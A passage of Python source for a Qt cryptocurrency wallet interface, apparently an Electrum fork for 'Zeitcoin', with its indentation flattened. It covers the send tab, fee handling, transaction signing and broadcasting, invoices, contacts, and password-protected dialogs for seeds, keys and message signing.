from paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Zeitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Zeitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.max_button = EnterButton(_("Max"), self.spend_max)
hbox = QHBoxLayout()
hbox.addWidget(self.max_button)
hbox.addStretch(1)
grid.addLayout(hbox, 4, 3)
msg = _('Zeitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
self.fee_slider = QSlider(Qt.Horizontal, self)
self.fee_slider.setRange(0, 4)
self.fee_slider.setToolTip('')
def slider_moved():
from electrum.util import fee_levels
pos = self.fee_slider.sliderPosition()
self.config.set_key('fee_level', pos, False)
self.spend_max() if self.is_max else self.update_fee()
tooltip = fee_levels[pos]
if self.network:
dynfee = self.network.dynfee(pos)
if dynfee:
tooltip += '\n' + self.format_amount(dynfee) + ' ' + self.base_unit() + '/kB'
QToolTip.showText(QCursor.pos(), tooltip, self.fee_slider)
self.fee_slider.valueChanged.connect(slider_moved)
self.fee_slider.setValue(self.config.get('fee_level', 2))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(self.update_fee)
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
self.fee_e.editingFinished.connect(self.update_fee)
self.rbf_checkbox = QCheckBox(_('Replaceable'))
msg = [_('If you check this box, your transaction will be marked as non-final,'),
_('and you will have the possiblity, while it is unconfirmed, to replace it with a transaction that pays a higher fee.'),
_('Note that some merchants do not accept non-final transactions until they are confirmed.')]
self.rbf_checkbox.setToolTip('<p>' + ' '.join(msg) + '</p>')
self.rbf_checkbox.setVisible(self.config.get('use_rbf', False))
grid.addWidget(self.fee_e_label, 5, 0)
grid.addWidget(self.fee_e, 5, 1)
grid.addWidget(self.fee_slider, 5, 1)
grid.addWidget(self.rbf_checkbox, 5, 2)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transactions before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 2)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
self.amount_e.textEdited.connect(self.reset_max)
def entry_changed():
text = ""
if self.not_enough_funds:
amt_color, fee_color = RED_FG, RED_FG
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
elif self.fee_e.isModified():
amt_color, fee_color = BLACK_FG, BLACK_FG
elif self.amount_e.isModified():
amt_color, fee_color = BLACK_FG, BLUE_FG
else:
amt_color, fee_color = BLUE_FG, BLUE_FG
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color)
self.fee_e.setStyleSheet(fee_color)
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
# Defer this until grid is parented to avoid ugly flash during startup
self.update_fee_edit()
run_hook('create_send_tab', grid)
return w
def spend_max(self):
inputs = self.get_coins()
sendable = sum(map(lambda x:x['value'], inputs))
fee = self.fee_e.get_amount() if self.fee_e.isModified() else None
r = self.get_payto_or_dummy()
amount, fee = self.wallet.get_max_amount(self.config, inputs, r, fee)
if not self.fee_e.isModified():
self.fee_e.setAmount(fee)
self.amount_e.setAmount(amount)
self.not_enough_funds = (fee + amount > sendable)
# emit signal for fiat_amount update
self.amount_e.textEdited.emit("")
self.is_max = True
def reset_max(self):
self.is_max = False
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = (self.fee_e.isModified()
and (self.fee_e.text() or self.fee_e.hasFocus()))
amount = self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
else:
fee = self.fee_e.get_amount() if freeze_fee else None
outputs = self.payto_e.get_outputs()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
try:
tx = self.wallet.make_unsigned_transaction(self.get_coins(), outputs, self.config, fee)
self.not_enough_funds = False
except NotEnoughFunds:
self.not_enough_funds = True
if not freeze_fee:
fee = None if self.not_enough_funds else self.wallet.get_tx_fee(tx)
self.fee_e.setAmount(fee)
def update_fee_edit(self):
b = self.config.get('dynamic_fees', True)
self.fee_slider.setVisible(b)
self.fee_e.setVisible(not b)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, domain = None):
self.pay_from = [] if domain == [] else self.wallet.get_spendable_coins(domain)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:8] + '...' + h[-8:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = unicode( self.message_e.text() )
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs()
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "%s" could not be validated via an additional security check, DNSSEC, and thus may not be correct.'%alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if addr is None:
self.show_error(_('Zeitcoin Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid Zeitcoin Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
fee = self.fee_e.get_amount()
if fee is None:
self.show_error(_('Invalid Fee'))
return
coins = self.get_coins()
return outputs, fee, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee, tx_desc, coins = r
amount = sum(map(lambda x:x[2], outputs))
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
use_rbf = self.rbf_checkbox.isChecked()
if use_rbf:
tx.set_sequence(0)
if tx.get_fee() < self.wallet.relayfee() * tx.estimated_size() / 1000 and tx.requires_fee(self.wallet):
self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
return
if preview:
self.show_transaction(tx, tx_desc)
return
# confirmation dialog
confirm_amount = self.config.get('confirm_amount', COIN)
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
extra_fee = run_hook('get_additional_fee', self.wallet, tx)
if extra_fee:
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(extra_fee) )
if tx.get_fee() >= self.config.get('confirm_fee', 100000):
msg.append(_('Warning')+ ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_password():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast(tx)
if pr and status is True:
pr.set_paid(tx.hash())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.hash(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.tabs.setCurrentIndex(1)
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.emit(SIGNAL('payment_request_ok'))
else:
self.emit(SIGNAL('payment_request_error'))
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(unicode(URI), self.on_pr)
except BaseException as e:
self.show_error(_('Invalid Zeitcoin URI:') + '\n' + str(e))
return
self.tabs.setCurrentIndex(1)
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fee_e]:
e.setText('')
e.setFrozen(False)
self.set_pay_from([])
self.rbf_checkbox.setChecked(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.update_fee()
def create_list_tab(self, l):
w = QWidget()
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setMargin(0)
vbox.setSpacing(0)
vbox.addWidget(l)
buttons = QWidget()
vbox.addWidget(buttons)
return w
def create_addresses_tab(self):
from address_list import AddressList
self.address_list = l = AddressList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
self.wallet.delete_address(addr)
self.address_list.update()
self.history_list.update()
def edit_account_label(self, k):
text, ok = QInputDialog.getText(self, _('Rename account'), _('Name') + ':', text = self.wallet.labels.get(k,''))
if ok:
label = unicode(text)
self.wallet.set_label(k,label)
self.address_list.update()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
domain = self.wallet.get_addresses()
return self.wallet.get_spendable_coins(domain)
def send_from_addresses(self, addrs):
self.set_pay_from(addrs)
self.tabs.setCurrentIndex(1)
self.update_fee()
def paytomany(self):
self.tabs.setCurrentIndex(1)
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.tabs.setCurrentIndex(1)
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_valid(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove %s from your list of contacts?")
% " + ".join(labels)):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Expires") + ':'), 1, 0)
grid.addWidget(QLabel(format_time(pr.get_expiration_date())), 1, 1)
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
grid.addWidget(QLabel(_("Payment URL") + ':'), 4, 0)
grid.addWidget(QLabel(pr.payment_url), 4, 1)
grid.addWidget(QLabel(_("Outputs") + ':'), 5, 0)
outputs_str = '\n'.join(map(lambda x: x[1] + ' ' + self.format_amount(x[2])+ self.base_unit(), pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 5, 1)
if pr.tx:
grid.addWidget(QLabel(_("Transaction ID") + ':'), 6, 0)
l = QLineEdit(pr.tx)
l.setReadOnly(True)
grid.addWidget(l, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
return
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'zeitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: apply( f, (method, args, self.password_dialog ))
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), self.run_network_dialog )
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from password_dialog import PasswordDialog, PW_CHANGE
msg = (_('Your wallet is encrypted. Use this dialog to change your '
'password. To disable wallet encryption, enter an empty new '
'password.') if self.wallet.has_password()
else _('Your wallet keys are not encrypted'))
d = PasswordDialog(self, self.wallet, msg, PW_CHANGE)
ok, password, new_password = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password)
except BaseException as e:
self.show_error(str(e))
return
except:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if new_password else _('This wallet is not encrypted')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
i = self.tabs.currentIndex()
if i == 0:
self.history_list.filter(t, [2, 3, 4]) # Date, Description, Amount
elif i == 1:
self.invoice_list.filter(t, [0, 1, 2, 3]) # Date, Requestor, Description, Amount
elif i == 2:
self.request_list.filter(t, [0, 1, 2, 3, 4]) # Date, Account, Address, Description, Amount
elif i == 3:
self.address_list.filter(t, [0,1, 2]) # Address, Label, Balance
elif i == 4:
self.contact_list.filter(t, [0, 1]) # Key, Value
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(unicode(line2.text()), str(line1.text()))
def show_master_public_keys(self):
dialog = WindowModalDialog(self, "Master Public Keys")
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(100)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(i+1)
return ''
labels = [ label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
def show_public_keys(self, address):
if not address: return
try:
pubkey_list = self.wallet.get_public_keys(address)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
d = WindowModalDialog(self, _("Public key"))
d.setMinimumSize(600, 200)
vbox = QVBoxLayout()
vbox.addWidget( QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Public key") + ':'))
keys_e = ShowQRTextEdit(text='\n'.join(pubkey_list))
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk_list = self.wallet.get_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 200)
vbox = QVBoxLayout()
vbox.addWidget( QLabel(_("Address") + ': ' + address))
vbox.addWidget( QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text='\n'.join(pk_list))
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
@protected
def do_sign(self, address, message, signature, password):
message = unicode(message.toPlainText()).encode('utf-8')
task = partial(self.wallet.sign_message, str(address.text()),
message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
message = unicode(message.toPlainText())
message = message.encode('utf-8')
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = bitcoin.verify_message(address.text(), sig, message)
except:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(410, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
cyphertext = str(encrypted_e.toPlainText())
task = partial(self.wallet.decrypt_message, str(pubkey_e.text()),
cyphertext, password)
self.wallet.thread.add(task, on_success=message_e.setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = unicode(message_e.toPlainText())
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, str(pubkey_e.text()))
encrypted_e.setText(encrypted)
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address = ''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
sequence = self.wallet.get_address_index(address)
pubkey = self.wallet.get_pubkey(*sequence)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
parent = parent or self
d = WindowModalDialog(parent, _("Enter Password"))
pw = QLineEdit()
pw.setEchoMode(2)
vbox = QVBoxLayout()
if not msg:
msg = _('Please enter your password')
vbox.addWidget(QLabel(msg))
grid = QGridLayout()
grid.setSpacing(8)
grid.addWidget(QLabel(_('Password')), 1, 0)
grid.addWidget(pw, 1, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
d.setLayout(vbox)
run_hook('password_dialog', pw, grid, 1)
if not d.exec_(): return
return unicode(pw.text())
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str, Transaction
try:
tx = tx_from_str(txt)
return Transaction(tx)
except:
traceback.print_exc(file=sys.stdout)
self.show_critical(_("Electrum was unable to parse your transaction"))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_qr(self.config)
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if data.startswith("zeitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
# transactions are binary, but qrcode seems to return utf8...
data = data.decode('utf8')
z = bitcoin.base_decode(data, length=None, base=43)
data = ''.join(chr(ord(b)) for b in z).encode('hex')
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
